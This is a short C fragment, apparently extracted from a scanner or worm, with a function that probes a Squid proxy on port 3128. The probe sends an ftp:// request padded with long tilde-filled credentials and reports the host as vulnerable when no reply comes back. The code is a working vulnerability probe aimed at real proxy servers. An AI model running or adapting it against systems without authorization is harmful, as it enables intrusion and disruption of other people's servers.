
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int pad ;
typedef int buf ;


 int close (int) ;
 int connect_to_host (unsigned long,int) ;
 int memset (char*,int,int) ;
 scalar_t__ net_read (int,char*,int) ;
 scalar_t__ net_write (int,char*,scalar_t__) ;
 int snprintf (char*,int,char*,char*,char*,char*) ;
 scalar_t__ strlen (char*) ;

int squid_check_if_vuln( unsigned long ip, char * host )
{
        int s ;
        char buf[ 1024 ];
        char pad[ 64 ];

        memset( buf, 0x0, sizeof(buf) );
        memset( pad, 0x7e, sizeof(pad) );
        pad[ 63 ] =0;

        snprintf( buf, sizeof(buf) - 1,
                "GET ftp://%s:%s@%s/ HTTP/1.0\r\n\r\n",
                pad, pad, host );

        buf[ 1024 - 1 ] =0;

        if ( (s = connect_to_host( ip, 3128 )) == -1 )
                return 0;

        if (net_write( s, buf, strlen(buf) ) == strlen(buf)) {
                memset( buf, 0x0, sizeof(buf) );
                if( net_read( s, buf, sizeof(buf)) > 0 ) {
                        close( s );
                        return 0;
                }
                else {
                        close( s );
                        return 1;
                }
        }
        close( s );
        return 0;
}
